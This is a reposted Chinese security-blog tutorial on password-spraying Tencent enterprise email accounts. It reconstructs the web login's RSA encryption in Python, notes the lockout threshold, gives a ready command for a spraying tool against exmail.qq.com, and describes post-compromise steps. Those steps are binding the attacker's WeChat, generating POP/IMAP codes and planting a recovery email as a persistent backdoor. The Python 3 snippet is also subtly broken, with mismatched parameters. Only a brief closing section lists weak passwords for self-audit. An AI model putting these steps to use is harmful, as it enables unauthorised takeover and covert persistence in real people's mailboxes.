某企业邮箱攻击面之密码喷洒

admin 2022年7月16日19:52:40评论36 views字数 3087阅读10分17秒阅读模式

本文转载自先知社区,作者tu

0x01 前言

某企业邮箱攻击面之密码喷洒

漏洞打点越来越难,最近整起了邮箱钓鱼,自建MX Server搭配GoFish可以满足大部分,提前养好域名也能投递到目标非垃圾箱邮箱,但是有一个内部邮箱才是一个神挡杀神的存在,分析了腾讯企业邮箱的登录逻辑,企业邮箱对POP3和SMTP的登录做了限制,只有绑定了微信登录并且开启了安全码(16位数字加大小写字母)才允许通过995、465端口进行认证登录,16位随机字符串基本排除爆破的可能。因此研究了前端web的登录逻辑,简单写了个单线程密码喷洒的脚本,自测效果还不错(尤其是内网DMZ打完。密码收集完,突破到办公系统)。

0x02 前台加密分析

TX企业邮箱Web端登录前台会对传入的数据进行RSA加密,加密代码

var PublicKey = "CF87D7B4C864F4842F1D337491A48FFF54B73A17300E8E42FA365420393AC0346AE55D8AFAD975DFA175FAF0106CBA81AF1DDE4ACEC284DAC6ED9A0D8FEB1CC070733C58213EFFED46529C54CEA06D774E3CC7E073346AEBD6C66FC973F299EB74738E400B22B1E7CDC54E71AED059D228DFEB5B29C530FF341502AE56DDCFE9";
var RSA = new RSAKey();
RSA.setPublic(PublicKey, "10001");
var PublicTs="1657285628";

var Res = RSA.encrypt(document.form1.pp.value + 'n' + document.form1.ts.value + 'n');
if (Res )
{
if (document.form1.chg.value == 1)
{
document.form1.p.value = hex2b64(Res);
}
else
{
if (document.form1.ppp.value != "")
{
document.form1.p.value = document.form1.ppp.value;
}
else
{
document.form1.p.value = hex2b64(Res);
}
}

这个PublicKey是rsa的模量,10001是指数,可以使用模量和指数生成公钥,然后利用公钥进行加密,python2和python3两个版本的实现方法,这里统一留存下

python2

import sys

from binascii import a2b_hex, b2a_hex
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5
from Crypto.Util.number import bytes_to_long

def encrypt_with_modulus(content, modulus=None):
e = long(0x10001)
n = bytes_to_long(a2b_hex(modulus))
rsa_key = RSA.construct((n, e))
# generate/export public key
public_key = rsa_key.publickey()
print(dir(public_key))
print(dir(public_key.exportKey))
print(public_key.exportKey.im_self)

cipher = PKCS1_v1_5.new(public_key)
# print(dir(cipher))
content = cipher.encrypt(content)
content = b2a_hex(content)
return str(content)

result = encrypt_with_modulus("123456n1657284648n","CF87D7B4C864F4842F1D337491A48FFF54B73A17300E8E42FA365420393AC0346AE55D8AFAD975DFA175FAF0106CBA81AF1DDE4ACEC284DAC6ED9A0D8FEB1CC070733C58213EFFED46529C54CEA06D774E3CC7E073346AEBD6C66FC973F299EB74738E400B22B1E7CDC54E71AED059D228DFEB5B29C530FF341502AE56DDCFE9")

print(result)

python3

def encrypt_with_modulus(e,n,content):
"""
根据 模量与指数 生成公钥,并利用公钥对内容 rsa 加密返回结果
:param e:指数
:param m: 模量
:param content:待加密字符串
:return: 加密后结果
"""
e = int(e, 16)
m = int(n, 16)

pub_key = rsa.PublicKey(e=e, n=n)
m = rsa.encrypt(content.encode(),pub_key)
print(m.hex())
return m.hex()


if __name__ == '__main__':
m = "CF87D7B4C864F4842F1D337491A48FFF54B73A17300E8E42FA365420393AC0346AE55D8AFAD975DFA175FAF0106CBA81AF1DDE4ACEC284DAC6ED9A0D8FEB1CC070733C58213EFFED46529C54CEA06D774E3CC7E073346AEBD6C66FC973F299EB74738E400B22B1E7CDC54E71AED059D228DFEB5B29C530FF341502AE56DDCFE9"
e = "10001"
con = '123456n1657284648n'

encrypt_with_modulus(e=e, m=m, content=con)

WEB端对passwdntimestampn这个串进行RSA加密,企业邮对同一账户的登录次数做了限制,大概测了下,10分钟内错误三次就会触发验证码机制,所以在收集到目标准确密码本之后,可以邮箱进行密码喷洒。

0x03 爆破脚本使用

地址:

https://github.com/R1card0-tutu/MailDOG

命令:

python3 MailDOG.py --domain="exmail.qq.com" --mailadd="main.txt" --passwd="1qaz@WSX" run
某企业邮箱攻击面之密码喷洒

0x04 后利用

在拿到邮箱之后

01 绑定微信

如果目标账号没有绑定微信,可以直接扫码绑定微信,没有二次验证

某企业邮箱攻击面之密码喷洒

02 安全码

生成16位安全码,可以使用POP和IMAP进行收发信操作。注意端口号,失败可以尝试下SSL端口。

某企业邮箱攻击面之密码喷洒

03 密保邮箱

上面两个操作基本就是一锤子买卖,用完账号基本也就凉了。当目标没有绑定手机号时,可以在账户 > 账户安全 > 设置密保邮箱,作为一个后门留存。

某企业邮箱攻击面之密码喷洒

0x05 企业邮安全

自查邮箱账户的0x03的三项

排查用户的常见口令

1qaz@WSX
目标域名@年份
目标域名#年份
Passw@rd
Passw0rd1
P@ssw0rd
某企业邮箱攻击面之密码喷洒
最近和xianke师傅录制了web安全入门课程
小白有兴趣的就可以来b站听听
大师傅就别来,我怕被笑话【🐔】

某企业邮箱攻击面之密码喷洒

某企业邮箱攻击面之密码喷洒

原文始发于微信公众号(猫因的安全):某企业邮箱攻击面之密码喷洒

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月16日19:52:40
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某企业邮箱攻击面之密码喷洒https://cn-sec.com/archives/1181762.html

发表评论

匿名网友 填写信息